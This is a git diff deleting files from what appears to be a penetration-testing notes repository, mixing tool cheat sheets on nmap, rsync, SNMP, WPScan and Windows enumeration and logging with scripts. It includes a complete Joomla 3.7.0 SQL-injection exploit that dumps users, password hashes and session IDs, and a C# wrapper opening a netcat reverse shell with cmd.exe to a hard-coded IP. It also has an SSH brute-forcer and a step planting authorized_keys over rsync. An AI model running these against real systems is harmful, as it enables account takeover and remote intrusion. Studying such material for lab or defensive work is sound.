||||||
* Intensity 9 `--version-all`
|
|
||||||
|
|
||||||
## Scripts
|
|
||||||
Installed at `/usr/share/nmap/scripts`
|
|
||||||
* __auth__ Authentication related scripts
|
|
||||||
* __broadcast__ Discover hosts by sending broadcast messages
|
|
||||||
* __brute__ Performs brute-force password auditing against logins
|
|
||||||
* __default__ Default scripts, same as -sC
|
|
||||||
* __discovery__ Retrieve accessible information, such as database tables and DNS names
|
|
||||||
* __dos Detects__ servers vulnerable to Denial of Service (DoS)
|
|
||||||
* __exploit__ Attempts to exploit various vulnerable services
|
|
||||||
* __external__ Checks using a third-party service, such as Geoplugin and Virustotal
|
|
||||||
* __fuzzer__ Launch fuzzing attacks
|
|
||||||
* __intrusive__ Intrusive scripts such as brute-force attacks and exploitation
|
|
||||||
* __malware__ Scans for backdoors
|
|
||||||
* __safe__ Safe scripts that won’t crash the target
|
|
||||||
* __version__ Retrieve service versions
|
|
||||||
* __vuln__ Checks for vulnerabilities or exploit vulnerable services
|
|
||||||
|
|
||||||
## Tips & Tricks
|
|
||||||
* Scan the 100 most interesting ports via `-F`
|
|
||||||
* `--top-ports 100`
|
|
||||||
* One probe every 5 minutes via `-T0`
|
|
||||||
* A closed port responds with `RST/ACK` to a initial `SYN`
|
|
||||||
* Scan ports iteratively by using `-r`, not random
|
|
||||||
* Closed Port
|
|
||||||
* Control packet rate via `--min-rate` and `--max-rate`
|
|
||||||
* Control parallel probes via `--min-parallelism` and `--max-parallelism`
|
|
||||||
* Fragment packets `-f` 8 bytes, `-ff` 16 bytes or `--mtu`
|
|
||||||
* Zombie Scan `-sI <pwnd-device-IP>` via pwnd host inside the targets network
|
|
||||||
* `--reason`, `-d`, `-vv`
|
|
||||||
* `--traceroute`
|
|
|
@ -1,13 +0,0 @@
|
||||||
# Port Knocking
|
|
||||||
|
|
||||||
* Open filtered port behind a firewall by knocking nicely
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
|
|
||||||
* `knockd`
|
|
||||||
```sh
|
|
||||||
knock <target-IP> <magicWords>
|
|
||||||
```
|
|
||||||
or
|
|
||||||
* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
|
|
||||||
* `nc -z`
|
|
|
@ -1,11 +0,0 @@
|
||||||
# rpcclient
|
|
||||||
|
|
||||||
```sh
|
|
||||||
rpcclient -U% $TARGET_IP
|
|
||||||
```
|
|
||||||
* Input commands, attributes count for the current user on the machine
|
|
||||||
```sh
|
|
||||||
enumdomusers
|
|
||||||
enumdomains
|
|
||||||
enumprivs
|
|
||||||
```
|
|
|
@ -1,39 +0,0 @@
|
||||||
# rsync
|
|
||||||
|
|
||||||
* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
|
|
||||||
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
|
|
||||||
|
|
||||||
## Enumerate
|
|
||||||
|
|
||||||
```sh
|
|
||||||
rsync <target-IP>::
|
|
||||||
rsync <target-IP>::files
|
|
||||||
rsync <target-IP>::files/foo/
|
|
||||||
```
|
|
||||||
### via netcat
|
|
||||||
* Another way is the following
|
|
||||||
```sh
|
|
||||||
nc -vn $TARGET_IP 873
|
|
||||||
```
|
|
||||||
* Repeat the identical handshake, e.g.
|
|
||||||
```
|
|
||||||
@RSYNCD: 31.0
|
|
||||||
```
|
|
||||||
* List all directories
|
|
||||||
```sh
|
|
||||||
#list
|
|
||||||
```
|
|
||||||
|
|
||||||
## Downloads
|
|
||||||
|
|
||||||
```sh
|
|
||||||
rsync <user>@<target-IP>::/files/foo/bar.txt .
|
|
||||||
rsync -r <user>@<target-IP>::/files/foo .
|
|
||||||
```
|
|
||||||
|
|
||||||
## Uploads
|
|
||||||
|
|
||||||
```sh
|
|
||||||
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
|
|
||||||
rsync -r documents <user>@<target-IP>::/files/foo/
|
|
||||||
```
|
|
|
@ -1,14 +0,0 @@
|
||||||
# Rustscan
|
|
||||||
|
|
||||||
* [Rustscan repo](https://github.com/RustScan/RustScan)
|
|
||||||
|
|
||||||
* Config at `$HOME/.rustscan_scripts.toml`
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
```sh
|
|
||||||
rustscan -r ports -a <Target-ip> -- <nmap cmds>
|
|
||||||
```
|
|
||||||
* Using nmap parameters
|
|
||||||
```sh
|
|
||||||
rustscan -a 127.0.0.1 -- -A -sC
|
|
||||||
```
|
|
|
@ -1,31 +0,0 @@
|
||||||
# Shodan
|
|
||||||
|
|
||||||
## Checking found Autonomous System Number (ASN)
|
|
||||||
* Shodan does output ASN, not necessarily the IP of a small company. Search for
|
|
||||||
```h
|
|
||||||
asn:AS13335
|
|
||||||
```
|
|
||||||
* [ASN Check](https://dnschecker.org/asn-whois-lookup.php)
|
|
||||||
|
|
||||||
## Banner
|
|
||||||
* Example
|
|
||||||
```json
|
|
||||||
{
|
|
||||||
"data": "Moxa Nport Device",
|
|
||||||
"Status": "Authentication disabled",
|
|
||||||
"Name": "NP5232I_4728",
|
|
||||||
"MAC": "00:90:e8:47:10:2d",
|
|
||||||
"ip_str": "46.252.132.235",
|
|
||||||
"port": 4800,
|
|
||||||
"org": "Starhub Mobile",
|
|
||||||
"location": {
|
|
||||||
"country_code": "SG"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
```
|
|
||||||
|
|
||||||
## Filter
|
|
||||||
* vulns
|
|
||||||
```sh
|
|
||||||
vuln:ms17-010
|
|
||||||
```
|
|
|
@ -1,11 +0,0 @@
|
||||||
# SNMP Enumeration
|
|
||||||
|
|
||||||
* Find community strings
|
|
||||||
```sh
|
|
||||||
onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
|
|
||||||
```
|
|
||||||
* Query users
|
|
||||||
```
|
|
||||||
snmpwalk -v2c -c <community_string> $TARGET_IP 1.3.6.1.4.1.77.1.2.25
|
|
||||||
```
|
|
||||||
|
|
|
@ -1,15 +0,0 @@
|
||||||
# snmpcheck
|
|
||||||
|
|
||||||
* [git repo](https://gitlab.com/kalilinux/packages/snmpcheck.git)
|
|
||||||
* Ruby script, clone and
|
|
||||||
```sh
|
|
||||||
cd snmpcheck
|
|
||||||
gem install snmp
|
|
||||||
chmod 775 snmpcheck-<version>.rb
|
|
||||||
```
|
|
||||||
|
|
||||||
## Usage
|
|
||||||
|
|
||||||
```sh
|
|
||||||
./snmpcheck-<version>.rb $TARGET_IP -c <community-string>
|
|
||||||
```
|
|
|
@ -1,12 +0,0 @@
|
||||||
# Website Enumeration
|
|
||||||
|
|
||||||
* `robots.txt`
|
|
||||||
* [Favicon](https://wiki.owasp.org/index.php/OWASP_favicon_database), `curl` target and `md5sum`
|
|
||||||
* `sitemap.xml`
|
|
||||||
* Headers, `curl <site>` including `-I` or `-v` parameters
|
|
||||||
* Check Components of the website, like blog frameworks, shops.
|
|
||||||
* User Wappalyzer
|
|
||||||
* Snapshots of the site via waybackmachine
|
|
||||||
* Check repos of the site
|
|
||||||
* Check buckets
|
|
||||||
* Fuzz
|
|
|
@ -1,6 +0,0 @@
|
||||||
# Wfuzz
|
|
||||||
|
|
||||||
* Fuzz parameters
|
|
||||||
```sh
|
|
||||||
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
|
|
||||||
```
|
|
|
@ -1,35 +0,0 @@
|
||||||
# WPScan
|
|
||||||
|
|
||||||
## Themes
|
|
||||||
```sh
|
|
||||||
wpscan --url <URL> --enumerate t
|
|
||||||
```
|
|
||||||
|
|
||||||
* `ls` for content
|
|
||||||
|
|
||||||
## Plugins
|
|
||||||
```sh
|
|
||||||
wpscan --url <URL> --enumerate p
|
|
||||||
```
|
|
||||||
|
|
||||||
## Users
|
|
||||||
```sh
|
|
||||||
wpscan --url <URL> --enumerate u
|
|
||||||
```
|
|
||||||
|
|
||||||
## Vulnerabilities
|
|
||||||
* WPVulnDB API is needed
|
|
||||||
* Plugins
|
|
||||||
```sh
|
|
||||||
wpscan --url <URL> --enumerate vp
|
|
||||||
```
|
|
||||||
|
|
||||||
## Password attack
|
|
||||||
```sh
|
|
||||||
wpscan --url <URL> --passwords <wordlist> --usernames <usersFromEnumeration>
|
|
||||||
```
|
|
||||||
|
|
||||||
## WAF Aggressiveness
|
|
||||||
```sh
|
|
||||||
wpscan --url <URL> --enumerate p --plugins-detection <aggressive/passive>
|
|
||||||
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 072168b27fbb991c8a009663bbe54b46a8b5dc15
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125
|
|
|
@ -1,186 +0,0 @@
|
||||||
#!/usr/bin/python3
|
|
||||||
import requests
|
|
||||||
import sys
|
|
||||||
import re
|
|
||||||
import argparse
|
|
||||||
import os
|
|
||||||
import random
|
|
||||||
import time
|
|
||||||
import binascii
|
|
||||||
|
|
||||||
|
|
||||||
def extract_token(resp):
|
|
||||||
match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
|
|
||||||
if match is None:
|
|
||||||
print(" [!] Cannot find CSRF token")
|
|
||||||
return None
|
|
||||||
return match.group(1)
|
|
||||||
|
|
||||||
|
|
||||||
def parse_options():
|
|
||||||
parser = argparse.ArgumentParser(description='Jooma Exploit')
|
|
||||||
parser.add_argument('url', help='Base URL for Joomla site')
|
|
||||||
return parser.parse_args()
|
|
||||||
|
|
||||||
|
|
||||||
def build_sqli(colname, morequery):
|
|
||||||
return "(SELECT " + colname + " " + morequery + ")"
|
|
||||||
|
|
||||||
def joomla_370_sqli_extract(options, sess, token, colname, morequery):
|
|
||||||
sqli = build_sqli("LENGTH("+colname+")", morequery)
|
|
||||||
length = joomla_370_sqli(options, sess, token, sqli)
|
|
||||||
if not length:
|
|
||||||
return None
|
|
||||||
length = int(length)
|
|
||||||
maxbytes = 30
|
|
||||||
offset = 0
|
|
||||||
result = ''
|
|
||||||
while length > offset:
|
|
||||||
sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery)
|
|
||||||
value = joomla_370_sqli(options, sess, token, sqli)
|
|
||||||
if not value:
|
|
||||||
print(" [!] Failed to retrieve string for query:", sqli)
|
|
||||||
return None
|
|
||||||
value = binascii.unhexlify(value)
|
|
||||||
result += value
|
|
||||||
offset += len(value)
|
|
||||||
return result
|
|
||||||
|
|
||||||
|
|
||||||
def joomla_370_sqli(options, sess, token, sqli):
|
|
||||||
sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)"
|
|
||||||
data = {
|
|
||||||
'option': 'com_fields',
|
|
||||||
'view': 'fields',
|
|
||||||
'layout': 'modal',
|
|
||||||
'list[fullordering]': sqli_full,
|
|
||||||
token: '1',
|
|
||||||
}
|
|
||||||
resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False)
|
|
||||||
match = re.search(r'XPATH syntax error:\s*'([^$\n]+)\s*'\s*</bl', resp.text, re.S)
|
|
||||||
if match:
|
|
||||||
match = match.group(1).strip()
|
|
||||||
if match[0] != ':' and match[-1] != ':':
|
|
||||||
return None
|
|
||||||
return match[1:-1]
|
|
||||||
|
|
||||||
|
|
||||||
def extract_joomla_tables(options, sess, token):
|
|
||||||
tables = list()
|
|
||||||
first = False
|
|
||||||
offset = 0
|
|
||||||
while True:
|
|
||||||
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
|
|
||||||
if result is None:
|
|
||||||
if first:
|
|
||||||
print("[!] Failed to retrieve first table name!")
|
|
||||||
return False
|
|
||||||
break
|
|
||||||
tables.append(result)
|
|
||||||
print(" - Found table:", result)
|
|
||||||
first = False
|
|
||||||
offset += 1
|
|
||||||
return tables
|
|
||||||
|
|
||||||
|
|
||||||
def extract_joomla_users(options, sess, token, table_name):
|
|
||||||
users = list()
|
|
||||||
offset = 0
|
|
||||||
first = False
|
|
||||||
print(" - Extracting users from", table_name)
|
|
||||||
while True:
|
|
||||||
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)", "FROM %s ORDER BY registerDate ASC LIMIT %d,1" % (table_name, offset) )
|
|
||||||
if result is None:
|
|
||||||
if first:
|
|
||||||
print("[!] Failed to retrieve user from table!")
|
|
||||||
return False
|
|
||||||
break
|
|
||||||
result = result.split('|')
|
|
||||||
print(" [$] Found user",result)
|
|
||||||
first = False
|
|
||||||
offset += 1
|
|
||||||
users.append(result)
|
|
||||||
return users
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def extract_joomla_sessions(options, sess, token, table_name):
|
|
||||||
sessions = list()
|
|
||||||
offset = 0
|
|
||||||
first = False
|
|
||||||
print(" - Extracting sessions from", table_name)
|
|
||||||
while True:
|
|
||||||
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(userid,0x7c,session_id,0x7c,username)", "FROM %s WHERE guest = 0 LIMIT %d,1" % (table_name, offset) )
|
|
||||||
if result is None:
|
|
||||||
if first:
|
|
||||||
print("[!] Failed to retrieve session from table!")
|
|
||||||
return False
|
|
||||||
break
|
|
||||||
result = result.split('|')
|
|
||||||
print(" [$] Found session", result)
|
|
||||||
first = False
|
|
||||||
offset += 1
|
|
||||||
sessions.append(result)
|
|
||||||
return sessions
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def pwn_joomla_again(options):
|
|
||||||
sess = requests.Session()
|
|
||||||
|
|
||||||
print(" [-] Fetching CSRF token")
|
|
||||||
resp = sess.get(options.url + "/index.php/component/users/?view=login")
|
|
||||||
token = extract_token(resp)
|
|
||||||
if not token:
|
|
||||||
return False
|
|
||||||
|
|
||||||
# Verify that we can perform SQLi
|
|
||||||
print(" [-] Testing SQLi")
|
|
||||||
result = joomla_370_sqli(options, sess, token, "128+127")
|
|
||||||
if result != "255":
|
|
||||||
print(" [!] Could not find SQLi output!")
|
|
||||||
return False
|
|
||||||
|
|
||||||
tables = extract_joomla_tables(options, sess, token)
|
|
||||||
|
|
||||||
for table_name in tables:
|
|
||||||
table_prefix = table_name[:-5]
|
|
||||||
extract_joomla_users(options, sess, token, table_name)
|
|
||||||
extract_joomla_sessions(options, sess, token, table_prefix + 'session')
|
|
||||||
|
|
||||||
return True
|
|
||||||
|
|
||||||
def print_logo():
|
|
||||||
clear = "\x1b[0m"
|
|
||||||
colors = [31, 32, 33, 34, 35, 36]
|
|
||||||
|
|
||||||
logo = """
|
|
||||||
.---. .-'''-. .-'''-.
|
|
||||||
| | ' _ \ ' _ \ .---.
|
|
||||||
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
|
|
||||||
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
|
|
||||||
| || ' | '| ' | '| .-. .-. '|| | | < |
|
|
||||||
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
|
|
||||||
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
|
|
||||||
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
|
|
||||||
| | | | | | | ||| | || |`" __ | | | / | |
|
|
||||||
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
|
|
||||||
__.' ' |/\'..' / '---'/ / | |_| | | |
|
|
||||||
| ' ' `'-'` \ \._,\ '/| '. | '.
|
|
||||||
|____.' `--' `" '---' '---'
|
|
||||||
"""
|
|
||||||
for line in logo.split("\n"):
|
|
||||||
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
|
|
||||||
#time.sleep(0.05)
|
|
||||||
|
|
||||||
def main(base_url):
|
|
||||||
options = parse_options()
|
|
||||||
options.url = options.url.rstrip('/')
|
|
||||||
print_logo()
|
|
||||||
pwn_joomla_again(options)
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
sys.exit(main("http://192.168.10.100:8080/joomla"))
|
|
||||||
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 9cfb81e4fab8037acb44c678773ca3f93bc2b39c
|
|
|
@ -1,11 +0,0 @@
|
||||||
#!/usr/bin/python3
|
|
||||||
import socket
|
|
||||||
host = "1.1.1.1"
|
|
||||||
portList = [21,22,53,80,443,3306,8443,8080]
|
|
||||||
for port in portList:
|
|
||||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
||||||
try:
|
|
||||||
s.connect((host,port))
|
|
||||||
print("Port ", port, " is open")
|
|
||||||
except:
|
|
||||||
print("Port ", port, " is closed")
|
|
|
@ -1,16 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
from scapy.all import *
|
|
||||||
|
|
||||||
interface = "wls3"
|
|
||||||
ip_range = "192.168.179.0/24"
|
|
||||||
broadcastMac = "ff:ff:ff:ff:ff:ff"
|
|
||||||
|
|
||||||
packet = Ether(dst=broadcastMac)/ARP(pdst=ip_range)
|
|
||||||
|
|
||||||
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)
|
|
||||||
|
|
||||||
for send, receive in ans:
|
|
||||||
print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))
|
|
||||||
|
|
||||||
|
|
|
@ -1,16 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
import requests
|
|
||||||
import sys
|
|
||||||
|
|
||||||
sub_dirs = []
|
|
||||||
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
|
|
||||||
sub_dirs = _f.read().splitlines()
|
|
||||||
|
|
||||||
for dir in sub_dirs:
|
|
||||||
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
|
|
||||||
r = requests.get(dir_enum)
|
|
||||||
if r.status_code == 404:
|
|
||||||
pass
|
|
||||||
else:
|
|
||||||
print("Valid directory: ", dir_enum)
|
|
|
@ -1,7 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
import requests
|
|
||||||
|
|
||||||
url = "https://download.sysinternals.com/files/PSTools.zip"
|
|
||||||
r = requests.get(url, allow_redirects=True)
|
|
||||||
open("PSTools.zip", 'wb').write(r.content)
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e
|
|
|
@ -1,2 +0,0 @@
|
||||||
#!/usr/bin/env bash
|
|
||||||
nc -zv $1 1-65535
|
|
|
@ -1,35 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
import sys
|
|
||||||
import socket
|
|
||||||
import pyfiglet
|
|
||||||
|
|
||||||
print(pyfiglet.figlet_format("Port Scanner"))
|
|
||||||
|
|
||||||
ip = sys.argv[1]
|
|
||||||
open_ports = []
|
|
||||||
ports = range(1,10000)
|
|
||||||
|
|
||||||
def probe_port(ip, port, result = 1):
|
|
||||||
try:
|
|
||||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
||||||
sock.settimeout(0.5)
|
|
||||||
r = sock.connect_ex((ip,port))
|
|
||||||
if r == 0:
|
|
||||||
result = r
|
|
||||||
sock.close()
|
|
||||||
except Exception as e:
|
|
||||||
pass
|
|
||||||
return result
|
|
||||||
|
|
||||||
for port in ports:
|
|
||||||
sys.stdout.flush()
|
|
||||||
response = probe_port(ip, port)
|
|
||||||
if response == 0:
|
|
||||||
open_ports.append(port)
|
|
||||||
|
|
||||||
if open_ports:
|
|
||||||
print("[+] Open Ports are: ")
|
|
||||||
print(sorted(open_ports))
|
|
||||||
else:
|
|
||||||
print("[-] No Open Ports")
|
|
|
@ -1,5 +0,0 @@
|
||||||
#!/bin/bash
|
|
||||||
ports=(21 22 53 80 443 3306 8443 8080)
|
|
||||||
for port in ${ports[@]}; do
|
|
||||||
timeout 1 bash -c "echo \"Port Scan Test\" > /dev/tcp/$1/$port && echo $port is open || /dev/null"
|
|
||||||
done
|
|
|
@ -1,22 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
import requests
|
|
||||||
import sys
|
|
||||||
|
|
||||||
subdomains = []
|
|
||||||
|
|
||||||
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
|
|
||||||
subdomains = _f.read().splitlines()
|
|
||||||
|
|
||||||
for sub in subdomains:
|
|
||||||
http_domain = f"http://{sub}.{sys.argv[1]}"
|
|
||||||
|
|
||||||
try:
|
|
||||||
requests.get(http_domain)
|
|
||||||
|
|
||||||
except requests.ConnectionError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
else:
|
|
||||||
print("Valid domain: ", http_domain)
|
|
||||||
|
|
|
@ -1,38 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
import paramiko
|
|
||||||
import sys
|
|
||||||
import os
|
|
||||||
|
|
||||||
target = str(input("IP address: "))
|
|
||||||
username = str(input("Username: "))
|
|
||||||
password_file = str(input("Location of password file: "))
|
|
||||||
|
|
||||||
def ssh_connect(password, code=0):
|
|
||||||
ssh = paramiko.SSHClient()
|
|
||||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
||||||
|
|
||||||
try:
|
|
||||||
ssh.connect(target, port=22, username=username, password=password)
|
|
||||||
except paramiko.AuthenticationException:
|
|
||||||
code = 1
|
|
||||||
ssh.close()
|
|
||||||
return code
|
|
||||||
|
|
||||||
with open(password_file, 'rb') as _f:
|
|
||||||
for line in _f.readlines():
|
|
||||||
password = line.strip()
|
|
||||||
print(password)
|
|
||||||
try:
|
|
||||||
response = ssh_connect(password)
|
|
||||||
|
|
||||||
if response == 0 :
|
|
||||||
print("[+] Password Found: " + password.decode())
|
|
||||||
exit(0)
|
|
||||||
if response == 1:
|
|
||||||
print("[-] Nothing Found")
|
|
||||||
except Exception as e:
|
|
||||||
print(e)
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 776bd91259c081588f99b5b0b9aa54e8c5fdf5ad
|
|
|
@ -1 +0,0 @@
|
||||||
Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a
|
|
|
@ -1,13 +0,0 @@
|
||||||
using System;
|
|
||||||
using System.Diagnostics;
|
|
||||||
|
|
||||||
namespace Wrapper {
|
|
||||||
class Program {
|
|
||||||
static void Main (){
|
|
||||||
Process proc = new Process();
|
|
||||||
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe");
|
|
||||||
proc.StartInfo = procInfo;
|
|
||||||
proc.Start();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
|
@ -1,3 +0,0 @@
|
||||||
# Bloodhound
|
|
||||||
|
|
||||||
* DNS
|
|
|
@ -1,99 +0,0 @@
|
||||||
# Logging
|
|
||||||
|
|
||||||
* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf)
|
|
||||||
* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm)
|
|
||||||
* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor)
|
|
||||||
* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630)
|
|
||||||
|
|
||||||
## Loglevel
|
|
||||||
|
|
||||||
|ID|Event Type|Description|
|
|
||||||
|--|----------|-----------|
|
|
||||||
|0|Error|An event that indicates a significant problem.|
|
|
||||||
|1|Warning|An event that is not necessarily significant.|
|
|
||||||
|2|Information|An event describing the successful operation of an application.|
|
|
||||||
|3|Success Audit|An event that records an audited security access attempt that is successful.|
|
|
||||||
|4|Failure Audit|An event that records an audited security access attempt that is failure.|
|
|
||||||
|
|
||||||
## Logrotation
|
|
||||||
|
|
||||||
```sh
|
|
||||||
C:\Windows\System32\winevt\Logs
|
|
||||||
```
|
|
||||||
* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties.
|
|
||||||
|
|
||||||
|
|
||||||
## Tools
|
|
||||||
|
|
||||||
* Event Viewer (GUI-based application)
|
|
||||||
* Wevtutil.exe (command-line tool)
|
|
||||||
* Get-WinEvent (PowerShell cmdlet)
|
|
||||||
|
|
||||||
### wevtutil.exe
|
|
||||||
|
|
||||||
```sh
|
|
||||||
wevtutil.exe /?
|
|
||||||
```
|
|
||||||
* Count logs
|
|
||||||
```sh
|
|
||||||
wevtutil.exe le | measure
|
|
||||||
```
|
|
||||||
* Read three most recent Application logs
|
|
||||||
```sh
|
|
||||||
wevtutil qe Application /c:3 /rd:true /f:text
|
|
||||||
```
|
|
||||||
|
|
||||||
### Get-WinEvent
|
|
||||||
|
|
||||||
* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1)
|
|
||||||
* List all the logs
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -ListLog *
|
|
||||||
```
|
|
||||||
* Find string
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' }
|
|
||||||
```
|
|
||||||
* Further filtering
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' }
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -ListProvider *Policy*
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description
|
|
||||||
```
|
|
||||||
* Filter by hashtable values
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' };
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
|
|
||||||
```
|
|
||||||
* Including __XPATH__
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]'
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"'
|
|
||||||
```
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1
|
|
||||||
```
|
|
||||||
* Find login by username
|
|
||||||
```sh
|
|
||||||
Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"'
|
|
||||||
```
|
|
||||||
|
|
||||||
### Command Line Logging
|
|
||||||
|
|
||||||
* Enable PS Logging
|
|
||||||
```sh
|
|
||||||
Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
|
|
||||||
```
|
|
||||||
* CLI Process Auditing -- ID 4688
|
|
||||||
```
|
|
||||||
Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation
|
|
||||||
```
|
|
||||||
|
|
|
@ -1,72 +0,0 @@
|
||||||
# Manual Windows Enumeration
|
|
||||||
|
|
||||||
## General Info
|
|
||||||
|
|
||||||
```sh
|
|
||||||
systeminfo
|
|
||||||
```
|
|
||||||
|
|
||||||
* Check installed updates
|
|
||||||
```sh
|
|
||||||
wmic qfe get Caption,Description
|
|
||||||
```
|
|
||||||
|
|
||||||
## Users
|
|
||||||
|
|
||||||
* `whoami /priv`
|
|
||||||
* `whoami /groups`
|
|
||||||
* `whoami /all`
|
|
||||||
* `net user`
|
|
||||||
|
|
||||||
* `net group`
|
|
||||||
* `net localgroup <groupname>`
|
|
||||||
* `net accounts`
|
|
||||||
* `net accounts /domain`
|
|
||||||
|
|
||||||
## Network Info
|
|
||||||
|
|
||||||
```sh
|
|
||||||
ipconfig
|
|
||||||
ipconfig /all
|
|
||||||
```
|
|
||||||
|
|
||||||
```sh
|
|
||||||
netstat -noba
|
|
||||||
```
|
|
||||||
|
|
||||||
```sh
|
|
||||||
arp -a
|
|
||||||
```
|
|
||||||
|
|
||||||
* Show shares
|
|
||||||
```sh
|
|
||||||
net share
|
|
||||||
```
|
|
||||||
|
|
||||||
## Services
|
|
||||||
|
|
||||||
```sh
|
|
||||||
net start
|
|
||||||
wmic service get name,version,vendor
|
|
||||||
```
|
|
||||||
|
|
||||||
### Non-Default Services
|
|
||||||
|
|
||||||
* Looking for non-default services:
|
|
||||||
```sh
|
|
||||||
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
|
|
||||||
```
|
|
||||||
|
|
||||||
* **Unquoted Service Path** Ideally there is a path without quotation
|
|
||||||
* Check which account the service the services run as
|
|
||||||
|
|
||||||
```sh
|
|
||||||
sc qc <ServiceName>
|
|
||||||
```
|
|
||||||
|
|
||||||
* Check if directory is writeable
|
|
||||||
|
|
||||||
```sh
|
|
||||||
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
|
|
||||||
```
|
|
||||||
|
|
|
@ -1,303 +0,0 @@
|
||||||
# Powershell Usage
|
|
||||||
|
|
||||||
## Get-Help
|
|
||||||
